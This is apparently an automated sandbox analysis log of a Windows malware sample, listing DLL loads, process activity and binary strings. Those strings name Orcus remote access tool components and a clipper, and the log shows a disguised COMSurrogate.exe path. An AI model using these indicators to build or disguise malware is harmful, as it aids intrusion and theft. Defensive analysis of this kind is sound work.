                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DM6vAAgoCw.exe | Static file information: File size 7284070 > 1048576
Source: DM6vAAgoCw.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.shelllibrary.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb@q source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed source: smartscreen.exe, 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: costura.directoryinfoex.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdbSHA256 source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: RegAsm.exe, 00000016.00000002.4570721077.0000000002A50000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: costura.orcus.shared.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: costura.opuswrapper.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdbH0 source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdb source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
